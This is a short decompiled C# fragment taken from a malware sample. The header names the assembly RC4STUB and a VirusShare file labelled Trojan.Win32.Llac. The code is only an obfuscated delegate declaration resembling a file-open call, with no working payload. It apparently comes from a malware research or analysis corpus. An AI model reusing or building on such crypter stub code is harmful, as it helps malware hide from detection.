// Decompiled with JetBrains decompiler // Type:  // Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 160606E6-36B6-4FBA-AFEC-6A83B6EA2ADB // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.coak-8789f9be2212d2703a374fd76b1c014be160523209fd6790cd7b4f20f0f5fe91.exe using Microsoft.VisualBasic; using System.Runtime.InteropServices; internal delegate void \u001A( [In] int obj0, [In] string obj1, [In] OpenMode obj2, [In] OpenAccess obj3, [In] OpenShare obj4, [In] int obj5);